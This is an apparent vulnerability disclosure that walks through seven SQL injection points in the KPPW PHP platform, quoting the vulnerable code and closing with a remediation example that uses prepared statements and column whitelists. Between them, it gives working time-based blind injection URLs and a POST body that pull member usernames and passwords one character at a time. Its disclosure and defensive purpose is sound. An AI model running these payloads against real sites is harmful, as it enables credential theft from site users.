
KPPW Latest Version SQL Injection Vulnerability 7 (Multiple Distinct Injection Points)

2015-01-20 23:47

KPPW latest version, SQL injection vulnerability 7: multiple distinct injection points




First SQL injection:

File /control/user/transaction_works.php:


if($action == 'delete_image'){
    // $fileid comes straight from the request and is interpolated unquoted into the IN(...) list
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
    $arrFileInfo = db_factory::get_one($strSql);
    $resText = CommonClass::delFileByFileId($fileid);
    if($resText){
        $array = explode(',', $arrServiceInfo['pic']);
        $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
        $_POST['file_ids'] = implode(",", $newArr);
        updateFilepath($arrServiceInfo['service_id'], $_POST['file_ids'], 'pic');
        kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die;
    }
}



Note this line:


$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);



$fileid enters the SQL statement without quote protection, so it is injectable.



Second and third SQL injections:

Continue with the next line:


$resText = CommonClass::delFileByFileId($fileid);



$fileid is then passed into the function delFileByFileId; following that function:

File: /lib/inc/CommonClass.php


public static function delFileByFileId($fileId){
    // same unquoted interpolation into IN(...) as the caller
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileId);
    $arrFileInfo = db_factory::get_one($strSql);
    $filename = S_ROOT.$arrFileInfo['save_name'];
    if(file_exists($filename)){
        unlink($filename);
    }
    // $fileId is concatenated directly into the DELETE statement as well
    return db_factory::execute("delete from ".TABLEPRE."witkey_file where file_id = ".$fileId);
}



There are two injections here: the $fileid variable enters both the select and the delete statement without any sanitization, leading to SQL injection.



Fourth, fifth and sixth SQL injections:

The same problem appears again in the file /control/user/transaction_works.php:


if($action == 'delete_goodsfile'){
    // identical pattern: unquoted $fileid in the IN(...) list, then passed to delFileByFileId
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
    $arrFileInfo = db_factory::get_one($strSql);
    $resText = CommonClass::delFileByFileId($fileid);
    if($resText){
        $array = explode(',', $arrServiceInfo['file_path']);
        $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
        $_POST['file_path_2'] = implode(",", $newArr);
        updateFilepath($arrServiceInfo['service_id'], $_POST['file_path_2'], 'file');
        kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die;
    }
}



The problem here is the same as the one analyzed above: the code is injectable.



Seventh SQL injection:

File /control/user/transaction_works.php:


if (isset($formhash)&&kekezu::submitcheck($formhash)) {
    $arrGoodsConfig = unserialize($kekezu->_model_list[6]['config']);
    $goodsprice = floatval($goodsprice);
    $floatMinCash = floatval($arrGoodsConfig['min_cash']);
    if($floatMinCash&&($goodsprice < $floatMinCash)){
        $tips['errors']['goodsprice'] = '最小金额不能少于'.$floatMinCash.'元';
        kekezu::show_msg($tips,null,NULL,NULL,'error');
    }
    if (strtoupper ( CHARSET ) == 'GBK') {
        $goodsname = kekezu::utftogbk($goodsname );
        $goodsdesc = kekezu::utftogbk($goodsdesc );
        $unite_price = kekezu::utftogbk($unite_price );
    }
    $arrData = array(
        'model_id'=> $arrServiceInfo['model_id']?$arrServiceInfo['model_id']:6,
        'uid'=> $gUid,
        'username'=> $gUserInfo['username'],
        'indus_id'=> $indus_id,
        'indus_pid'=> $indus_pid,
        'title'=> $goodsname,
        'price' => $goodsprice,
        'pic'=> $file_ids,
        'content'=> $goodsdesc,
        'unite_price'=> $unite_price,
        'submit_method'=> $submit_method,
        'file_path'=> $file_path_2,
        'confirm_max' => intval($arrGoodsConfig['confirm_max_day'])
    );
    if(!$pk['service_id']){
        $arrData['profit_rate'] = $arrGoodsConfig['service_profit'];
        $arrData['on_time'] = time();
        $arrData['service_status'] = 2;
    }
    $objServiceT = new keke_table_class ( 'witkey_service' );
    // $pk is a request-controlled array; its key ends up as a column name in save()
    $objServiceT->save ( $arrData,$pk);
    unset($objServiceT);
    if ($objId&&$intTaskId) {
        $strBidSql = ' UPDATE `'.TABLEPRE.'witkey_task_bid` SET `hasdel`=1 WHERE (`bid_id` ='.$objId.') and task_id = '.$intTaskId;
        $strWorkSql = ' UPDATE `'.TABLEPRE.'witkey_task_work` SET `hasdel`=1 WHERE (`work_id`='.$objId.') and task_id = '.$intTaskId;
        db_factory::execute($strBidSql);
        db_factory::execute($strWorkSql);
    }
    kekezu::show_msg('操作成功',$strJumpUrl,NULL,NULL,'ok');
}



Note this line:


$objServiceT->save ( $arrData,$pk);



The variable $pk is passed into the save function; following save:

File /lib/inc/keke_table_class.php:


function save($fields, $pk = array()) {
    foreach ( $fields as $k => $v ) {
        $kk = ucfirst ( $k );
        $set_query = "set" . $kk;
        $this->_table_obj->$set_query ( $v );
    }
    // the first array key of $pk is taken as the column name with no validation
    $keys = array_keys ( $pk );
    $key = $keys [0];
    //echo $key."\n";
    //print_r($pk);
    //echo $pk[$key];
    if (! empty ( $pk [$key] )) {
        // only the value is quoted; $key is concatenated raw into the WHERE clause
        $this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" );
        $edit_query = "edit_" . $this->_pre . $this->_table_name;
        $res = $this->_table_obj->$edit_query ();
    } else {
        $create_query = "create_" . $this->_pre . $this->_table_name;
        $res = $this->_table_obj->$create_query ();
    }
    if ($res) {
        return $res;
    } else {
        return false;
    }
}



Finally, the key of $pk is placed into the setWhere condition, leading to SQL injection.

First SQL injection (proof of concept):


http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566) and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23



The response is delayed by 5 seconds here, showing that the first character of the username is "a"; continuing in this way extracts the user information.



Second and third SQL injections (proof of concept):


http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)



The response is delayed by 5 seconds here, showing that the first character of the username is "a"; continuing in this way extracts the user information.
 






Seventh SQL injection (proof of concept):


http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork

formhash=6cb7d4&objId=0&pk%5Bservice_id=1+and+1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23%5D=222222&goodsname=111&goodsdesc=111&indus_pid=249&indus_id=-1&upload=&file_ids=&goodsprice=111&unite_price=%E4%B8%AA&submit_method=outside&file_upload_i=&file_path_2=



The response is delayed by 5 seconds here, showing that the first character of the username is "a"; continuing in this way extracts the user information.

Solution:

Adding single-quote protection around the values is sufficient.
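As an added example (not KPPW's own code), the following shows a hardened form of both patterns discussed above: the comma-separated file id list is reduced to integers and bound into a prepared statement, and the $pk column name is checked against a fixed whitelist before it is used in the WHERE clause. It assumes PDO, with an in-memory SQLite table standing in for the MySQL witkey_file table.

```php
<?php
// Added example, not KPPW's own code: hardened versions of the two patterns above.
// Assumes PDO; an in-memory SQLite table stands in for the MySQL witkey_file table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE keke_witkey_file (file_id INTEGER PRIMARY KEY, file_name TEXT, save_name TEXT)");
$db->exec("INSERT INTO keke_witkey_file VALUES (5566, 'a.png', 'data/a.png'), (5567, 'b.png', 'data/b.png')");

// Injection points 1-6: $fileid was concatenated unquoted into "file_id in(%s)".
// Fix: accept only a comma-separated list of positive integers and bind each one.
function parseFileIds(string $raw): array {
    $ids = [];
    foreach (explode(',', $raw) as $part) {
        $part = trim($part);
        if (!ctype_digit($part) || $part === '0') {
            throw new InvalidArgumentException("invalid file id: $part");
        }
        $ids[] = (int)$part;
    }
    return $ids;
}

function delFileByFileId(PDO $db, string $rawIds): int {
    $ids = parseFileIds($rawIds);                      // throws before any SQL is built
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("DELETE FROM keke_witkey_file WHERE file_id IN ($marks)");
    $stmt->execute($ids);                              // values travel as parameters, not SQL
    return $stmt->rowCount();
}

// Injection point 7: the *key* of $pk became the column name inside setWhere().
// Fix: the column name must come from a fixed whitelist; the value is bound as a parameter.
const PK_COLUMNS = ['file_id' => true, 'service_id' => true];
function findByPk(PDO $db, array $pk): array {
    $column = array_key_first($pk);                    // PHP 7.3+
    if (!isset(PK_COLUMNS[$column])) {
        throw new InvalidArgumentException('unexpected primary key column');
    }
    $stmt = $db->prepare("SELECT * FROM keke_witkey_file WHERE $column = ?");
    $stmt->execute([$pk[$column]]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs shaped like the PoC values above: the malformed ones are rejected before reaching SQL.
foreach (['5566) and 1=1#', '5566, 5567'] as $input) {
    try { echo delFileByFileId($db, $input), " row(s) deleted\n"; }
    catch (InvalidArgumentException $e) { echo "blocked: {$e->getMessage()}\n"; }
}
try { findByPk($db, ['file_id = 1 or 1=1#' => 1]); }
catch (InvalidArgumentException $e) { echo "blocked: {$e->getMessage()}\n"; }
```

Quoting alone, as the solution above suggests, still depends on every value being escaped; binding parameters and whitelisting identifiers removes that dependency for both the value and the column-name cases.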

Source: www.2cto.com/Article/201501/371780.html
